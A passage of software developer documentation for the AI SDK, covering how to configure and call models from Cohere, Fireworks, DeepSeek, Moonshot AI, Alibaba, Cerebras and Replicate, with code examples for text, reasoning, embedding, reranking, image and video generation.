Optional function to generate unique IDs for each request. Defaults to the SDK's built-in ID generator.

Language Models

You can create models that call the Cohere chat API using a provider instance. The first argument is the model id, e.g. command-r-plus. Some Cohere chat models support tool calls.

const model = cohere('command-r-plus');

Example

You can use Cohere language models to generate text with the generateText function:

import { cohere } from '@ai-sdk/cohere';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cohere('command-r-plus'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Cohere language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`command-a-03-2025`
`command-a-reasoning-08-2025`
`command-r7b-12-2024`
`command-r-plus-04-2024`
`command-r-plus`
`command-r-08-2024`
`command-r-03-2024`
`command-r`
`command`
`command-nightly`
`command-light`
`command-light-nightly`

Reasoning

Cohere has introduced reasoning with the command-a-reasoning-08-2025 model. You can learn more at https://docs.cohere.com/docs/reasoning.

import { cohere, type CohereLanguageModelOptions } from '@ai-sdk/cohere';
import { generateText } from 'ai';

async function main() {
  const { text, reasoning } = await generateText({
    model: cohere('command-a-reasoning-08-2025'),
    prompt:
      "Alice has 3 brothers and she also has 2 sisters. How many sisters does Alice's brother have?",
    // optional: reasoning options
    providerOptions: {
      cohere: {
        thinking: {
          type: 'enabled',
          tokenBudget: 100,
        },
      } satisfies CohereLanguageModelOptions,
    },
  });

  console.log(reasoning);
  console.log(text);
}

main().catch(console.error);

Embedding Models

You can create models that call the Cohere embed API using the .embedding() factory method.

const model = cohere.embedding('embed-english-v3.0');

You can use Cohere embedding models to generate embeddings with the embed function:

import { cohere, type CohereEmbeddingModelOptions } from '@ai-sdk/cohere';
import { embed } from 'ai';

const { embedding } = await embed({
  model: cohere.embedding('embed-english-v3.0'),
  value: 'sunny day at the beach',
  providerOptions: {
    cohere: {
      inputType: 'search_document',
    } satisfies CohereEmbeddingModelOptions,
  },
});

Cohere embedding models support additional provider options that can be passed via providerOptions.cohere:

import { cohere, type CohereEmbeddingModelOptions } from '@ai-sdk/cohere';
import { embed } from 'ai';

const { embedding } = await embed({
  model: cohere.embedding('embed-english-v3.0'),
  value: 'sunny day at the beach',
  providerOptions: {
    cohere: {
      inputType: 'search_document',
      truncate: 'END',
    } satisfies CohereEmbeddingModelOptions,
  },
});

The following provider options are available:

inputType 'search_document' | 'search_query' | 'classification' | 'clustering'

Specifies the type of input passed to the model. Default is search_query.
- search_document: Used for embeddings stored in a vector database for search use-cases.
- search_query: Used for embeddings of search queries run against a vector DB to find relevant documents.
- classification: Used for embeddings passed through a text classifier.
- clustering: Used for embeddings run through a clustering algorithm.
truncate 'NONE' | 'START' | 'END'

Specifies how the API will handle inputs longer than the maximum token length. Default is END.
- NONE: If selected, when the input exceeds the maximum input token length will return an error.
- START: Will discard the start of the input until the remaining input is exactly the maximum input token length for the model.
- END: Will discard the end of the input until the remaining input is exactly the maximum input token length for the model.

Model Capabilities

Model	Embedding Dimensions
`embed-english-v3.0`	1024
`embed-multilingual-v3.0`	1024
`embed-english-light-v3.0`	384
`embed-multilingual-light-v3.0`	384
`embed-english-v2.0`	4096
`embed-english-light-v2.0`	1024
`embed-multilingual-v2.0`	768

Reranking Models

You can create models that call the Cohere rerank API using the .reranking() factory method.

const model = cohere.reranking('rerank-v3.5');

You can use Cohere reranking models to rerank documents with the rerank function:

import { cohere } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const documents = [
  'sunny day at the beach',
  'rainy afternoon in the city',
  'snowy night in the mountains',
];

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents,
  query: 'talk about rain',
  topN: 2,
});

console.log(ranking);
// [
//   { originalIndex: 1, score: 0.9, document: 'rainy afternoon in the city' },
//   { originalIndex: 0, score: 0.3, document: 'sunny day at the beach' }
// ]

Cohere reranking models support additional provider options that can be passed via providerOptions.cohere:

import { cohere, type CohereRerankingModelOptions } from '@ai-sdk/cohere';
import { rerank } from 'ai';

const { ranking } = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  providerOptions: {
    cohere: {
      maxTokensPerDoc: 1000,
      priority: 1,
    } satisfies CohereRerankingModelOptions,
  },
});

The following provider options are available:

maxTokensPerDoc number

Maximum number of tokens per document. Default is 4096.
priority number

Priority of the request. Default is 0.

Model Capabilities

Model
`rerank-v3.5`
`rerank-english-v3.0`
`rerank-multilingual-v3.0`

title: Fireworks description: Learn how to use Fireworks models with the AI SDK.

Fireworks Provider

Fireworks is a platform for running and testing LLMs through their API.

Setup

The Fireworks provider is available via the @ai-sdk/fireworks module. You can install it with

Provider Instance

You can import the default provider instance fireworks from @ai-sdk/fireworks:

import { fireworks } from '@ai-sdk/fireworks';

If you need a customized setup, you can import createFireworks from @ai-sdk/fireworks and create a provider instance with your settings:

import { createFireworks } from '@ai-sdk/fireworks';

const fireworks = createFireworks({
  apiKey: process.env.FIREWORKS_API_KEY ?? '',
});

You can use the following optional settings to customize the Fireworks provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.fireworks.ai/inference/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the FIREWORKS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create Fireworks models using a provider instance. The first argument is the model id, e.g. accounts/fireworks/models/firefunction-v1:

const model = fireworks('accounts/fireworks/models/firefunction-v1');

Reasoning Models

import { fireworks } from '@ai-sdk/fireworks';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const enhancedModel = wrapLanguageModel({
  model: fireworks('accounts/fireworks/models/deepseek-r1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Example

You can use Fireworks language models to generate text with the generateText function:

import { fireworks } from '@ai-sdk/fireworks';
import { generateText } from 'ai';

const { text } = await generateText({
  model: fireworks('accounts/fireworks/models/firefunction-v1'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Fireworks language models can also be used in the streamText function (see AI SDK Core).

Provider Options

Fireworks chat models support additional provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

import {
  fireworks,
  type FireworksLanguageModelOptions,
} from '@ai-sdk/fireworks';
import { generateText } from 'ai';

const { text, reasoningText } = await generateText({
  model: fireworks('accounts/fireworks/models/kimi-k2p5'),
  providerOptions: {
    fireworks: {
      thinking: { type: 'enabled', budgetTokens: 4096 },
      reasoningHistory: 'interleaved',
    } satisfies FireworksLanguageModelOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

The following optional provider options are available for Fireworks chat models:

thinking object

Configuration for thinking/reasoning models like Kimi K2.5.
- type 'enabled' | 'disabled'
  
  Whether to enable thinking mode.
- budgetTokens number
  
  Maximum number of tokens for thinking (minimum 1024).
reasoningHistory 'disabled' | 'interleaved' | 'preserved'

Controls how reasoning history is handled in multi-turn conversations:
- 'disabled': Remove reasoning from history
- 'interleaved': Include reasoning between tool calls within a single turn
- 'preserved': Keep all reasoning in history

Completion Models

You can create models that call the Fireworks completions API using the .completionModel() factory method:

const model = fireworks.completionModel(
  'accounts/fireworks/models/firefunction-v1',
);

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`accounts/fireworks/models/firefunction-v1`
`accounts/fireworks/models/deepseek-r1`
`accounts/fireworks/models/deepseek-v3`
`accounts/fireworks/models/llama-v3p1-405b-instruct`
`accounts/fireworks/models/llama-v3p1-8b-instruct`
`accounts/fireworks/models/llama-v3p2-3b-instruct`
`accounts/fireworks/models/llama-v3p3-70b-instruct`
`accounts/fireworks/models/mixtral-8x7b-instruct`
`accounts/fireworks/models/mixtral-8x7b-instruct-hf`
`accounts/fireworks/models/mixtral-8x22b-instruct`
`accounts/fireworks/models/qwen2p5-coder-32b-instruct`
`accounts/fireworks/models/qwen2p5-72b-instruct`
`accounts/fireworks/models/qwen-qwq-32b-preview`
`accounts/fireworks/models/qwen2-vl-72b-instruct`
`accounts/fireworks/models/llama-v3p2-11b-vision-instruct`
`accounts/fireworks/models/qwq-32b`
`accounts/fireworks/models/yi-large`
`accounts/fireworks/models/kimi-k2-instruct`
`accounts/fireworks/models/kimi-k2-thinking`
`accounts/fireworks/models/kimi-k2p5`
`accounts/fireworks/models/minimax-m2`

Embedding Models

You can create models that call the Fireworks embeddings API using the .embeddingModel() factory method:

const model = fireworks.embeddingModel('nomic-ai/nomic-embed-text-v1.5');

You can use Fireworks embedding models to generate embeddings with the embed function:

import { fireworks } from '@ai-sdk/fireworks';
import { embed } from 'ai';

const { embedding } = await embed({
  model: fireworks.embeddingModel('nomic-ai/nomic-embed-text-v1.5'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`nomic-ai/nomic-embed-text-v1.5`	768	8192

Image Models

You can create Fireworks image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { fireworks } from '@ai-sdk/fireworks';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/flux-1-dev-fp8'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Image Editing

Fireworks supports image editing through FLUX Kontext models (flux-kontext-pro and flux-kontext-max). Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/flux-kontext-pro'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  providerOptions: {
    fireworks: {
      output_format: 'jpeg',
    },
  },
});

Style Transfer

Apply artistic styles to an image:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: fireworks.image('accounts/fireworks/models/flux-kontext-pro'),
  prompt: {
    text: 'Transform this into a watercolor painting style',
    images: [imageBuffer],
  },
  aspectRatio: '1:1',
});

Model Capabilities

For all models supporting aspect ratios, the following aspect ratios are supported:

1:1 (default), 2:3, 3:2, 4:5, 5:4, 16:9, 9:16, 9:21, 21:9

For all models supporting size, the following sizes are supported:

640 x 1536, 768 x 1344, 832 x 1216, 896 x 1152, 1024x1024 (default), 1152 x 896, 1216 x 832, 1344 x 768, 1536 x 640

Model	Dimensions Specification	Image Editing
`accounts/fireworks/models/flux-kontext-pro`	Aspect Ratio
`accounts/fireworks/models/flux-kontext-max`	Aspect Ratio
`accounts/fireworks/models/flux-1-dev-fp8`	Aspect Ratio
`accounts/fireworks/models/flux-1-schnell-fp8`	Aspect Ratio
`accounts/fireworks/models/playground-v2-5-1024px-aesthetic`	Size
`accounts/fireworks/models/japanese-stable-diffusion-xl`	Size
`accounts/fireworks/models/playground-v2-1024px-aesthetic`	Size
`accounts/fireworks/models/SSD-1B`	Size
`accounts/fireworks/models/stable-diffusion-xl-1024-v1-0`	Size

For more details, see the Fireworks models page.

Stability AI Models

Fireworks also presents several Stability AI models backed by Stability AI API keys and endpoint. The AI SDK Fireworks provider does not currently include support for these models:

Model ID
`accounts/stability/models/sd3-turbo`
`accounts/stability/models/sd3-medium`
`accounts/stability/models/sd3`

title: DeepSeek description: Learn how to use DeepSeek's models with the AI SDK.

DeepSeek Provider

The DeepSeek provider offers access to powerful language models through the DeepSeek API.

API keys can be obtained from the DeepSeek Platform.

Setup

The DeepSeek provider is available via the @ai-sdk/deepseek module. You can install it with:

Provider Instance

You can import the default provider instance deepseek from @ai-sdk/deepseek:

import { deepseek } from '@ai-sdk/deepseek';

For custom configuration, you can import createDeepSeek and create a provider instance with your settings:

import { createDeepSeek } from '@ai-sdk/deepseek';

const deepseek = createDeepSeek({
  apiKey: process.env.DEEPSEEK_API_KEY ?? '',
});

You can use the following optional settings to customize the DeepSeek provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.deepseek.com.
apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPSEEK_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chat() or .languageModel() factory methods:

const model = deepseek.chat('deepseek-chat');
// or
const model = deepseek.languageModel('deepseek-chat');

DeepSeek language models can be used in the streamText function (see AI SDK Core).

The following optional provider options are available for DeepSeek models:

thinking object

Optional. Controls thinking mode (chain-of-thought reasoning). You can enable thinking mode either by using the deepseek-reasoner model or by setting this option.
- type: 'enabled' | 'disabled' - Enable or disable thinking mode.

import { deepseek, type DeepSeekLanguageModelOptions } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'How many "r"s are in the word "strawberry"?',
  providerOptions: {
    deepseek: {
      thinking: { type: 'enabled' },
    } satisfies DeepSeekLanguageModelOptions,
  },
});

Reasoning

DeepSeek has reasoning support for the deepseek-reasoner model. The reasoning is exposed through streaming:

import { deepseek } from '@ai-sdk/deepseek';
import { streamText } from 'ai';

const result = streamText({
  model: deepseek('deepseek-reasoner'),
  prompt: 'How many "r"s are in the word "strawberry"?',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    // This is the reasoning text
    console.log('Reasoning:', part.text);
  } else if (part.type === 'text') {
    // This is the final answer
    console.log('Answer:', part.text);
  }
}

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Cache Token Usage

import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';

const result = await generateText({
  model: deepseek('deepseek-chat'),
  prompt: 'Your prompt here',
});

console.log(result.providerMetadata);
// Example output: { deepseek: { promptCacheHitTokens: 1856, promptCacheMissTokens: 5 } }

The metrics include:

promptCacheHitTokens: Number of input tokens that were cached
promptCacheMissTokens: Number of input tokens that were not cached

Model Capabilities

Model	Text Generation	Object Generation	Image Input	Tool Usage	Tool Streaming
`deepseek-chat`
`deepseek-reasoner`

title: Moonshot AI description: Learn how to use Moonshot AI models with the AI SDK.

Moonshot AI Provider

The Moonshot AI provider offers access to powerful language models through the Moonshot API, including the Kimi series of models with reasoning capabilities.

API keys can be obtained from the Moonshot Platform.

Setup

The Moonshot AI provider is available via the @ai-sdk/moonshotai module. You can install it with:

Provider Instance

You can import the default provider instance moonshotai from @ai-sdk/moonshotai:

import { moonshotai } from '@ai-sdk/moonshotai';

For custom configuration, you can import createMoonshotAI and create a provider instance with your settings:

import { createMoonshotAI } from '@ai-sdk/moonshotai';

const moonshotai = createMoonshotAI({
  apiKey: process.env.MOONSHOT_API_KEY ?? '',
});

You can use the following optional settings to customize the Moonshot AI provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.moonshot.ai/v1
apiKey string

API key that is being sent using the Authorization header. It defaults to the MOONSHOT_API_KEY environment variable
headers Record<string,string>

Custom headers to include in the requests
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation

Language Models

You can create language models using a provider instance:

import { moonshotai } from '@ai-sdk/moonshotai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: moonshotai('kimi-k2.5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chatModel() or .languageModel() factory methods:

const model = moonshotai.chatModel('kimi-k2.5');
// or
const model = moonshotai.languageModel('kimi-k2.5');

Moonshot AI language models can be used in the streamText function (see AI SDK Core).

Reasoning Models

import {
  moonshotai,
  type MoonshotAILanguageModelOptions,
} from '@ai-sdk/moonshotai';
import { generateText } from 'ai';

const { text, reasoningText } = await generateText({
  model: moonshotai('kimi-k2-thinking'),
  providerOptions: {
    moonshotai: {
      thinking: { type: 'enabled', budgetTokens: 2048 },
      reasoningHistory: 'interleaved',
    } satisfies MoonshotAILanguageModelOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

console.log(reasoningText);
console.log(text);

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Provider Options

The following optional provider options are available for Moonshot AI language models:

thinking object

Configuration for thinking/reasoning models like Kimi K2 Thinking.
- type 'enabled' | 'disabled'
  
  Whether to enable thinking mode
- budgetTokens number
  
  Maximum number of tokens for thinking (minimum 1024)
reasoningHistory 'disabled' | 'interleaved' | 'preserved'

Controls how reasoning history is handled in multi-turn conversations:
- 'disabled': Remove reasoning from history
- 'interleaved': Include reasoning between tool calls within a single turn
- 'preserved': Keep all reasoning in history

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`moonshot-v1-8k`
`moonshot-v1-32k`
`moonshot-v1-128k`
`kimi-k2`
`kimi-k2.5`
`kimi-k2-thinking`
`kimi-k2-thinking-turbo`
`kimi-k2-turbo`

title: Alibaba description: Learn how to use Alibaba Cloud Model Studio (Qwen) models with the AI SDK.

Alibaba Provider

Alibaba Cloud Model Studio provides access to the Qwen model series, including advanced reasoning capabilities.

API keys can be obtained from the Console.

Setup

The Alibaba provider is available via the @ai-sdk/alibaba module. You can install it with:

Provider Instance

You can import the default provider instance alibaba from @ai-sdk/alibaba:

import { alibaba } from '@ai-sdk/alibaba';

For custom configuration, you can import createAlibaba and create a provider instance with your settings:

import { createAlibaba } from '@ai-sdk/alibaba';

const alibaba = createAlibaba({
  apiKey: process.env.ALIBABA_API_KEY ?? '',
});

You can use the following optional settings to customize the Alibaba provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers or regional endpoints. The default prefix is https://dashscope-intl.aliyuncs.com/compatible-mode/v1.
videoBaseURL string

Use a different URL prefix for video generation API calls. The video API uses the DashScope native endpoint (not the OpenAI-compatible endpoint). The default prefix is https://dashscope-intl.aliyuncs.com.
apiKey string

API key that is being sent using the Authorization header. It defaults to the ALIBABA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.
includeUsage boolean

Include usage information in streaming responses. When enabled, token usage will be included in the final chunk. Defaults to true.

Language Models

You can create language models using a provider instance:

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text } = await generateText({
  model: alibaba('qwen-plus'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can also use the .chatModel() or .languageModel() factory methods:

const model = alibaba.chatModel('qwen-plus');
// or
const model = alibaba.languageModel('qwen-plus');

Alibaba language models can be used in the streamText function (see AI SDK Core).

The following optional provider options are available for Alibaba models:

enableThinking boolean

Enable thinking/reasoning mode for supported models. When enabled, the model generates reasoning content before the response. Defaults to false.
thinkingBudget number

Maximum number of reasoning tokens to generate. Limits the length of thinking content.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.

Thinking Mode

Alibaba's Qwen models support thinking/reasoning mode for complex problem-solving:

import { alibaba, type AlibabaLanguageModelOptions } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model: alibaba('qwen3-max'),
  providerOptions: {
    alibaba: {
      enableThinking: true,
      thinkingBudget: 2048,
    } satisfies AlibabaLanguageModelOptions,
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

console.log('Reasoning:', reasoning);
console.log('Answer:', text);

For models that are thinking-only (like qwen3-235b-a22b-thinking-2507), thinking mode is enabled by default.

Tool Calling

Alibaba models support tool calling with parallel execution:

import { alibaba } from '@ai-sdk/alibaba';
import { generateText, tool } from 'ai';
import { z } from 'zod';

const { text } = await generateText({
  model: alibaba('qwen-plus'),
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Prompt Caching

Alibaba supports both implicit and explicit prompt caching to reduce costs for repeated prompts.

Single message cache control

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const { text, usage } = await generateText({
  model: alibaba('qwen-plus'),
  messages: [
    {
      role: 'system',
      content: 'You are a helpful assistant. [... long system prompt ...]',
      providerOptions: {
        alibaba: {
          cacheControl: { type: 'ephemeral' },
        },
      },
    },
  ],
});

Multi-part message cache control

import { alibaba } from '@ai-sdk/alibaba';
import { generateText } from 'ai';

const longDocument = '... large document content ...';

const { text, usage } = await generateText({
  model: alibaba('qwen-plus'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Context: Please analyze this document.',
        },
        {
          type: 'text',
          text: longDocument,
          providerOptions: {
            alibaba: {
              cacheControl: { type: 'ephemeral' },
            },
          },
        },
      ],
    },
  ],
});

Note: The minimum content length for a cache block is 1,024 tokens.

Video Models

You can create Wan video models that call the Alibaba Cloud DashScope API using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

Alibaba supports three video generation modes: text-to-video, image-to-video (first frame), and reference-to-video.

Text-to-Video

Generate videos from text prompts:

import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: alibaba.video('wan2.6-t2v'),
  prompt: 'A serene mountain lake at sunset with gentle ripples on the water.',
  resolution: '1280x720',
  duration: 5,
  providerOptions: {
    alibaba: {
      promptExtend: true,
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies AlibabaVideoModelOptions,
  },
});

Image-to-Video

Generate videos from a first-frame image and optional text prompt:

import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: alibaba.video('wan2.6-i2v'),
  prompt: {
    image: 'https://example.com/landscape.jpg',
    text: 'Camera slowly pans across the landscape',
  },
  duration: 5,
  providerOptions: {
    alibaba: {
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies AlibabaVideoModelOptions,
  },
});

Reference-to-Video

Generate videos using reference images and/or videos for character consistency. Use character identifiers (character1, character2, etc.) in your prompt to reference them:

import { alibaba, type AlibabaVideoModelOptions } from '@ai-sdk/alibaba';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: alibaba.video('wan2.6-r2v-flash'),
  prompt: 'character1 walks through a beautiful garden and waves at the camera',
  resolution: '1280x720',
  duration: 5,
  providerOptions: {
    alibaba: {
      referenceUrls: ['https://example.com/character-reference.jpg'],
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies AlibabaVideoModelOptions,
  },
});

Video Provider Options

The following provider options are available via providerOptions.alibaba:

negativePrompt string

A description of what to avoid in the generated video (max 500 characters).
audioUrl string

URL to an audio file for audio-video sync (WAV/MP3, 3-30 seconds, max 15MB).
promptExtend boolean

Enable prompt extension/rewriting for better generation quality. Defaults to true.
shotType 'single' | 'multi'

Shot type for video generation. 'multi' enables multi-shot cinematic narrative (wan2.6 models only).
watermark boolean

Whether to add a watermark to the generated video. Defaults to false.
audio boolean

Whether to generate audio (for I2V and R2V models that support it).
referenceUrls string[]

Array of reference image/video URLs for reference-to-video mode. Supports 0-5 images and 0-3 videos, max 5 total.
pollIntervalMs number

Polling interval in milliseconds for checking task status. Defaults to 5000.
pollTimeoutMs number

Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).

Video Model Capabilities

Text-to-Video

Model	Audio	Resolution	Duration
`wan2.6-t2v`	Yes	720P, 1080P	2-15s
`wan2.5-t2v-preview`	Yes	480P, 720P, 1080P	5s, 10s

Image-to-Video (First Frame)

Model	Audio	Resolution	Duration
`wan2.6-i2v-flash`	Optional	720P, 1080P	2-15s
`wan2.6-i2v`	Yes	720P, 1080P	2-15s

Reference-to-Video

Model	Audio	Resolution	Duration
`wan2.6-r2v-flash`	Optional	720P, 1080P	2-10s
`wan2.6-r2v`	Yes	720P, 1080P	2-10s

Model Capabilities

Please see the Alibaba Cloud Model Studio docs for a full list of available models. You can also pass any available provider model ID as a string if needed.

title: Cerebras description: Learn how to use Cerebras's models with the AI SDK.

Cerebras Provider

The Cerebras provider offers access to powerful language models through the Cerebras API, including their high-speed inference capabilities powered by Wafer-Scale Engines and CS-3 systems.

API keys can be obtained from the Cerebras Platform.

Setup

The Cerebras provider is available via the @ai-sdk/cerebras module. You can install it with:

Provider Instance

You can import the default provider instance cerebras from @ai-sdk/cerebras:

import { cerebras } from '@ai-sdk/cerebras';

For custom configuration, you can import createCerebras and create a provider instance with your settings:

import { createCerebras } from '@ai-sdk/cerebras';

const cerebras = createCerebras({
  apiKey: process.env.CEREBRAS_API_KEY ?? '',
});

You can use the following optional settings to customize the Cerebras provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.cerebras.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the CEREBRAS_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Language Models

You can create language models using a provider instance:

import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';

const { text } = await generateText({
  model: cerebras('llama3.1-8b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Cerebras language models can be used in the streamText function (see AI SDK Core).

You can create Cerebras language models using a provider instance. The first argument is the model ID, e.g. llama-3.3-70b:

const model = cerebras('llama-3.3-70b');

You can also use the .languageModel() and .chat() methods:

const model = cerebras.languageModel('llama-3.3-70b');
const model = cerebras.chat('llama-3.3-70b');

Reasoning Models

Cerebras offers several reasoning models including gpt-oss-120b, qwen-3-32b, and zai-glm-4.7 that generate intermediate thinking tokens before their final response. The reasoning output is streamed through the standard AI SDK reasoning parts.

For gpt-oss-120b, you can control the reasoning depth using the reasoningEffort provider option:

import { cerebras } from '@ai-sdk/cerebras';
import { streamText } from 'ai';

const result = streamText({
  model: cerebras('gpt-oss-120b'),
  providerOptions: {
    cerebras: {
      reasoningEffort: 'medium',
    },
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log('Reasoning:', part.text);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Provider Options

The following optional provider options are available for Cerebras language models:

reasoningEffort 'low' | 'medium' | 'high'

Controls the depth of reasoning for GPT-OSS models. Defaults to 'medium'.
user string

A unique identifier representing your end-user, which can help with monitoring and abuse detection.
strictJsonSchema boolean

Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance. Defaults to true.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Reasoning
`llama3.1-8b`
`llama-3.3-70b`
`gpt-oss-120b`
`qwen-3-32b`
`qwen-3-235b-a22b-instruct-2507`
`qwen-3-235b-a22b-thinking-2507`
`zai-glm-4.6`
`zai-glm-4.7`

title: Replicate description: Learn how to use Replicate models with the AI SDK.

Replicate Provider

Replicate is a platform for running open-source AI models. It is a popular choice for running image generation models.

Setup

The Replicate provider is available via the @ai-sdk/replicate module. You can install it with

Provider Instance

You can import the default provider instance replicate from @ai-sdk/replicate:

import { replicate } from '@ai-sdk/replicate';

If you need a customized setup, you can import createReplicate from @ai-sdk/replicate and create a provider instance with your settings:

import { createReplicate } from '@ai-sdk/replicate';

const replicate = createReplicate({
  apiToken: process.env.REPLICATE_API_TOKEN ?? '',
});

You can use the following optional settings to customize the Replicate provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.replicate.com/v1.
apiToken string

API token that is being sent using the Authorization header. It defaults to the REPLICATE_API_TOKEN environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation.

Image Models

You can create Replicate image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Supported Image Models

The following image models are currently supported by the Replicate provider:

Text-to-Image Models:

Inpainting and Image Editing Models:

Flux-2 Models (Multi-Reference Image Generation):

These models support up to 8 input reference images for style transfer and composition:

Basic Usage

import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';
import { writeFile } from 'node:fs/promises';

const { image } = await generateImage({
  model: replicate.image('black-forest-labs/flux-schnell'),
  prompt: 'The Loch Ness Monster getting a manicure',
  aspectRatio: '16:9',
});

await writeFile('image.webp', image.uint8Array);

console.log('Image saved as image.webp');

Model-specific options

import { replicate, type ReplicateImageModelOptions } from '@ai-sdk/replicate';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image('recraft-ai/recraft-v3'),
  prompt: 'The Loch Ness Monster getting a manicure',
  size: '1365x1024',
  providerOptions: {
    replicate: {
      style: 'realistic_image',
    } satisfies ReplicateImageModelOptions,
  },
});

Versioned Models

import { replicate } from '@ai-sdk/replicate';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: replicate.image(
    'bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637',
  ),
  prompt: 'The Loch Ness Monster getting a manicure',
});

Image Editing

Replicate supports image editing through various models. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: replicate.image('black-forest-labs/flux-fill-dev'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  providerOptions: {
    replicate: {
      guidance_scale: 7.5,
      num_inference_steps: 30,
    } satisfies ReplicateImageModelOptions,
  },
});

